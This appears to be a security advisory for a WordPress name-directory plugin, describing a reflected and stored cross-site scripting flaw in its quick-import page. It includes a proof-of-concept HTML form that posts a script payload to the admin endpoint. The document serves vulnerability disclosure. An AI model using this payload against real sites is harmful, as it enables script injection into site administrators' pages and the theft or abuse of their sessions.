The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. Furthermore, as the payload is also saved into the database after the request, it leads to a Stored XSS as well
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=name-directory&sub=quick-import" method="POST">
<input type="hidden" name="mode" value="new" />
<input type="hidden" name="name" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="submit" value="Next step" />
<input type="submit" value="Submit"/>
</form>
</body>
</html>